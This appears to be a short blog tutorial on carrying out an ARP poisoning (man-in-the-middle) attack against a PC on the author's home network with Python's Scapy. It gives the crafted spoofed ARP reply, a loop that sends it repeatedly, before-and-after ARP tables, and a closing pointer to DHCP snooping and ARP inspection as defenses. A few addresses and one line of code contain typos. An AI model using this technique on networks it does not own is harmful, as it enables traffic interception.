Perform an Arp Poisoning Attack Using Scapy
In this post I will show you how to perform an arp poisoning attack on local network using a python package called scapy. Scapy is a package that allows us to craft our own packets specifying all layers from layer2 to layer7.
In my local network I have two pcs, with addresses 192.168.1.73 and 192.168.1.78, respectively. The adsl router has ip 192.168.1.254 and is the gw of the two pcs.
My goal is to arp poison pc 192.168.1.78 so that it sends its packet to pc 192.168.1.73 instead of gw 192.168.1.154
Lets see the arp table of 192.168.1.78
arp -a
Interface: 192.168.1.78 --- 0xb
Internet Address Physical Address Type
192.168.1.73 fc-aa-14-01-cd-41 dynamic
192.168.1.254 00-1f-9f-ce-d3-94 dynamic
192.168.1.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Now I will create an arp reply packet and send it from 192.168.73 to 192.168.1.78. If you don’t have scapy installed, do a pip install scapy, and run scapy. You will get a »> prompt. there you can write python code
(base) D:\NetEng>pip install scapy
Requirement already satisfied: scapy in d:\anaconda3\lib\site-packages (2.4.3)
(base) D:\NetEng>scapy
aSPY//YASa
apyyyyCY//////////YCa |
sY//////YSpcs scpCY//Pp | Welcome to Scapy
ayp ayyyyyyySCP//Pp syY//C | Version 2.4.3
AYAsAYYYYYYYY///Ps cY//S |
pCCCCY//p cSSps y//Y | https://github.com/secdev/scapy
SPPPP///a pP///AC//Y |
A//A cyP////C | Have fun!
p///Ac sC///a |
P////YCpc A//A | Wanna support scapy? Rate it on
scccccp///pSP///p p//Y | sectools!
sY/////////y caa S//P | http://sectools.org/tool/scapy/
cayCyayP//Ya pY/Ya | -- Satoshi Nakamoto
sY/PsY////YCc aC//Yp |
sc sccaCY//PCypaapyCP//YSs
spCPY//////YPSps
ccaacs
using IPython 6.5.0
>>>
then you can write python code
>>>arpspoofed = ARP(op=2, psrc="192.168.1.254", pdst="192.168.1.78"
hwdst="FC:AA:14:01:CD:41")
>>> arpspoofed.show()
###[ ARP ]###
hwtype= 0x1
ptype= IPv4
hwlen= None
plen= None
op= is-at
hwsrc= fc:aa:14:01:cd:41
psrc= 192.168.1.254
hwdst= FC:AA:14:01:CD:41
pdst= 192.168.1.78
>>> while(True):
...: send(arpspoofed)
Lets check the arp table of 192.168.1.78 again
(base) C:\Users\User>arp -a
Interface: 192.168.1.78 --- 0xb
Internet Address Physical Address Type
192.168.1.73 fc-aa-14-01-cd-41 dynamic
192.168.1.254 fc-aa-14-01-cd-41 dynamic
192.168.1.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
You see now that the target pc believes that 192.168.1.254 has hw address the address of 192.168.1.73. From now on it will send all packets destined to 192.168.1.254 to 192.168.1.73
So you can see that performing an arp poisoning or Man in the Middle attack is very easy. Of course there are ready made tools than can automate all this stuff for you, but I wanted to show you how to do it yourself.
In order to avoid this kind of attacks you have to apply dhcp snooping and arp inspection on your local Network. Please check my post on how to do this. Configuring dhcp snooping and arp inspection